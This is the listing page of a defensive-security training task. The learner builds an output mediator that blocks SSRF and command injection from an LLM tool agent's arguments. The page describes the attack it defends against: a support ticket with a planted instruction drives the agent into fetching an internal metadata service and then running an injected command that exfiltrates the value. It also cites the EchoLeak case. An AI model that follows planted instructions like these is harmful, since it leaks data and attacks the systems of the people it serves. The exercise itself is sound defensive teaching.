Build a Contextual Output-Encoding and Allow-List Mediator
Treat model output as untrusted input to every sink it reaches. Build a per-sink output mediator that applies the correct contextual defense before model text touches an interpreter: allow-list and validate for HTTP egress (the http_fetch SSRF sink), and run an argv array under least privilege with no shell for the system command (the provision_note command-injection sink). Wire it in front of the provided deliberately-vulnerable tool agent, then use a provided SSRF + command-injection proof-of-concept chain as a pass/fail oracle: the exploit must come back blocked at both sinks while a benign control still fetches and provisions. The deliverable is the mediator. Submit a project (or a single script or notebook) for instant, rubric-based feedback.
3 hrs
Est. time
4
Outcomes
7
Rubric criteria
65%
Pass score
What you'll learn
Skills you'll have real reps in after shipping this.
The scenario
You are the platform engineer who owns the boundary where an LLM application hands model output to its interpreters. The same app a red team already broke: a customer-support tool agent that copies the model's tool arguments into an HTTP fetch and a system command. Neither sink treats model output as untrusted, so a single planted instruction in a support ticket turns into SSRF against the internal metadata service chained into command injection that exfiltrates the value it read. Your job is the fix, and it has to hold.
Your security lead does not want a model-side classifier that an attacker can phrase around. She wants a mediator at each sink that allow-lists, validates, and runs commands without a shell by construction, so model output cannot inject regardless of what the model was talked into saying. The acceptance test is concrete: the provided exploit chain must come back blocked at both sinks, and a benign fetch and a benign provision note must still work with no regression. That mediator, proven against the exploit oracle, is this task.
Your role
You are a defensive security engineer hardening the output boundary of an LLM application. Your goal is a project whose center of gravity is the control: a per-sink output mediator that applies allow-listing and egress validation (scheme, host, IP-literal, and resolved-IP checks) for the HTTP fetch sink, and a least-privilege argv-array handler run without a shell for the system-command sink. You then re-run a provided SSRF + command-injection exploit chain as a pass/fail oracle against a benign control set, with tests and evidence showing the exploit is blocked at both sinks while normal functionality is preserved.
Start the task to unlock the full brief
You'll get the step-by-step requirements, setup commands, the 7-criterion grading rubric, tips, and the ability to submit your solution for instant AI grading.
Free to start · submit when you're ready
Learning resources
What this task is
This is a build-and-submit defensive-security task, not a quiz about output handling. You produce a project whose deliverable is a control: a per-sink output mediator that treats model output as untrusted input to every interpreter it reaches. The mediator applies an allow-list with resolved-IP validation for the HTTP fetch sink (the SSRF gate) and an argv array run under least privilege with no shell for the system-command sink (the command-injection gate). A provided SSRF plus command-injection proof-of-concept chain is the pass/fail oracle: the exploit must come back blocked at both sinks, while a benign control still fetches the approved status route and records a provision note.
Insecure output handling (OWASP LLM05:2025, with LLM06 excessive agency as the enabler) is the mechanism behind real incidents where model output flowed unsanitized into a sink, including the EchoLeak zero-click exploit that encoded a user's data into a URL the client auto-loaded. The skill this task builds is the defensive counterpart: instead of phrasing an attack, you build the boundary that makes the provided attack inert by construction. A sink-side mediator holds regardless of what the planted ticket talked the model into emitting, which is why it is the durable defense-in-depth control rather than a model-side classifier an attacker can rephrase around.
Grading is rubric-based and explainable. Your submission is scored against weighted criteria (the per-sink mediator present and correct, a tested and bypass-resistant mediator that re-runs the provided exploit and blocks it while keeping benign use working, benign functionality preserved, an unmediated-versus-mediated causation contrast, a runnable hermetic harness, and a remediation rationale with standards mapping) with per-criterion feedback. The pass threshold is 65 percent and you can resubmit.